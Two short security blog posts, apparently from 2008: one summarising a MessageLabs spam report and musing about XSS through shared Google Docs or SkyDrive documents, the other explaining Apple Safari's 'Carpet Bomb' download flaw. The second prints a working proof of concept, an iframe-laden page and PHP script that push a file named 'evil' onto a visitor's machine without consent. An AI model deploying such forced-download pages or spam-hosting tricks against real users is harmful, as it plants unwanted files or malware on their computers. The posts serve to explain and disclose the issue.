Spam hits highest rate in 15 months

In this month, MessageLabs released a report about spam. It states that spam is accounting 76.8 percent of all email in May 2008. Spam mail increased by 3.3% since April with 1 in 1.3 emails being spam. This is the first time I read this kind of statistic analysis, I cannot imagine that there are so many spam flowing around the Internet!

Why there is such a big jump? According to the report, the spammer trying to contain links to spam content contained in documents hosted on Google Docs, and Microsoft’s SkyDrive environment. It is because the domain names they previously bought were getting blacklisted quickly, but it is difficult to block Google and Microsoft applications because they are widely used by normal users. On the other hand, “the spammers are also taking advantage of Google Analytics to gauge their success with each spam run.” from the report.

Here is a simple example:

Click the following link and win the big money!!
http://docs.google.com/View?docid=dgmszc7x_312xstksmgn

After constructing the above example, I discovered that Google Docs has a “Report spam” link on the page above, I think it should be a quick response to this new type spam. I will give a try to SkyDrive later.

Spammers are always seeking for ways to bypass spam filters, which for the most spam filters, it is not reasonable to block links to Google Docs or Microsoft’ SkyDrive, according to the report. On the other hand, the report mentioned that spammers insert a URL in an email that leads the victim to a Google Docs-hosted page. The content of the spam contains only the link to free hosting services, but it will lead you to what the spammer want you to visit.

Besides, another things that shock me in the report is that, the most spammed country is Hong Kong with levels reaching 85.9% of all email. How many spam you received everyday?

I am thinking that if this technology (eg. Google Docs) can be used to perform CSRF or XSS by sending an email to a gmail user, saying that I have shared a document with you, but the document is going to still sensitive information from you. But the key thing is Google Docs allow you to write client-side scripting on it or at least make client-side scripting executable in the document. A quick demo in SkyDrive.

This link will execute a javascript alert function.
XSS demo in SkyDrive

Should you have any idea or comment about this stuff, please feel free to leave a comment.

Reference:

• Report: Worldwide Spam Hits Highest Rate in 15 Months
• MessageLabs Intelligence: May 2008

Filed under: news, spam , google, hong kong, microsoft, skydrive, spam

Safari Carpet Bomb

Most of you may know what Safari is. If you don’t, let me brief describe it in few words. Safari is a very typical web browser like Firefox and Internet Explorer, which is developed by Apple. As a general user of Mac OS, it is very usual that Safari does not ask for user permission when going to download file. It may not be a security problem to most user, but some annoying things can be done by use this feature of Safari. Consider there is a site http://iam.not.evil/, the index page of it contains following code.

<html>
<body>
<iframe src=”get_file.php”></iframe>
<iframe src=”get_file.php”></iframe>
<iframe src=”get_file.php”></iframe>
…
<iframe src=”get_file.php”></iframe>
</body>
</html>

Inside get_file.php, we are going to send a file to user. My attempt is as follow.

<?php
$data = file_get_contents(“evil”);
header(‘Content-Type: application/x-zip’);
header(‘Content-Length: ‘ . strlen($data));
header(‘Content-Disposition: attachment; filename=evil’);
die($data);
?>

You may have a try by visiting the following site. The below site only contains one iframe trying to download a empty file evil to your computer.
http://www.cse.cuhk.edu.hk/~hkho5/security/

Since Safari will not ask user consent before downloading a file, the implication of it is obvious, downloaded malware to the victim’s desktop without user’s consent. This problem may not cause security problem in Mac OS, but it do annoying the users, after they closed the Safari and discovered that how beautiful there desktop is!

This security problem is discovered by Nitesh Dhanjani. He try to report it to Apple, but Apple thinks that it is not a security issue. Furthermore, Microsoft warn that this “special feature” of Safari may cause blended attack in Window XP and Window Vista.

“Microsoft says it is the combination of the default download file location in Safari and how the Windows desktop handles the files that creates the blended threat on all supported versions of Windows XP and Windows Vista when Apple’s Safari for Windows has been installed.” from ZDNet.co.uk

It reminds me that sometime something is very nature or usual, but it does not mean that it is reasonable or safe!

Reference:

• Safari Carpet Bomb
• Apple dismisses Safari vulnerability claims
• Microsoft warns of blended Safari attack

ps. I don’t know how Windows desktop handles files. Should you know it, please let me know.

Filed under: app sec , apple, mac, microsoft, safari, windows